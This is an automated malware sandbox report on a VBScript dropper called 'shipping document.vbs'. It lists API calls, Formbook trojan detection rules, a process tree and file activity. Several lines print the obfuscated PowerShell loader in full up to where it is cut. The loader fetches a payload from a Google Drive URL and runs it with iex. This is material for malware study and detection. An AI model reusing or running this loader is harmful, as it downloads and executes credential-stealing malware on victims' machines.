        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252F30 NtCreateSection,12_2_20252F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252F60 NtCreateProcessEx,12_2_20252F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252FA0 NtQuerySection,12_2_20252FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252FB0 NtResumeThread,12_2_20252FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252F90 NtProtectVirtualMemory,12_2_20252F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20252FE0 NtCreateFile,12_2_20252FE0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF88799C3423_2_00007FF88799C342
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF88799B5963_2_00007FF88799B596
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_044EF2589_2_044EF258
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_044EFB289_2_044EFB28
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_044EEF109_2_044EEF10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D70E912_2_202D70E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DF0E012_2_202DF0E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CF0CC12_2_202CF0CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202270C012_2_202270C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021010012_2_20210100
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BA11812_2_202BA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202EB16B12_2_202EB16B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2025516C12_2_2025516C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020F17212_2_2020F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E01AA12_2_202E01AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022B1B012_2_2022B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D81CC12_2_202D81CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C027412_2_202C0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202252A012_2_202252A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C12ED12_2_202C12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B2C012_2_2023B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D132D12_2_202D132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2020D34C12_2_2020D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DA35212_2_202DA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2026739A12_2_2026739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E03E612_2_202E03E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022E3F012_2_2022E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DF43F12_2_202DF43F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021146012_2_20211460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D244612_2_202D2446
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CE4F612_2_202CE4F6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022053512_2_20220535
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D757112_2_202D7571
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BD5B012_2_202BD5B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202E059112_2_202E0591
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023C6E012_2_2023C6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D16CC12_2_202D16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022077012_2_20220770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024475012_2_20244750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DF7B012_2_202DF7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021C7C012_2_2021C7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2028D80012_2_2028D800
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022284012_2_20222840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022A84012_2_2022A840
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202068B812_2_202068B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202238E012_2_202238E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2024E8F012_2_2024E8F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023696212_2_20236962
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022995012_2_20229950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023B95012_2_2023B950
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202229A012_2_202229A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202EA9A612_2_202EA9A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20293A6C12_2_20293A6C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DFA4912_2_202DFA49
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D7A4612_2_202D7A46
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20265AA012_2_20265AA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202BDAAC12_2_202BDAAC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021EA8012_2_2021EA80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202CDAC612_2_202CDAC6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DFB7612_2_202DFB76
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DAB4012_2_202DAB40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023FB8012_2_2023FB80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2025DBF912_2_2025DBF9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D6BD712_2_202D6BD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20299C3212_2_20299C32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220C0012_2_20220C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202C0CB512_2_202C0CB5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20210CF212_2_20210CF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DFCF212_2_202DFCF2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022AD0012_2_2022AD00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D7D7312_2_202D7D73
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20223D4012_2_20223D40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202D1D5A12_2_202D1D5A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20238DBF12_2_20238DBF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2021ADE012_2_2021ADE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2023FDC012_2_2023FDC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DEE2612_2_202DEE26
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20220E5912_2_20220E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20229EB012_2_20229EB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20232E9012_2_20232E90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DCE9312_2_202DCE93
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DEEDB12_2_202DEEDB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20262F2812_2_20262F28
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20240F3012_2_20240F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DFF0912_2_202DFF09
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20294F4012_2_20294F40
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_202DFFB112_2_202DFFB1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20221F9212_2_20221F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2022CFE012_2_2022CFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_20212FC812_2_20212FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 20255130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 20267E54 appears 87 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2028EA12 appears 84 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2029F290 appears 105 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 2020B970 appears 266 times
        Source: shipping document.vbsInitial sample: Strings found which are bigger than 50
        Source: amsi32_5852.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Finindstillingernes119.UniJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6856
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5852
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: shipping document.vbsReversingLabs: Detection: 31%
        Source: shipping document.vbsVirustotal: Detection: 40%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. .lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm 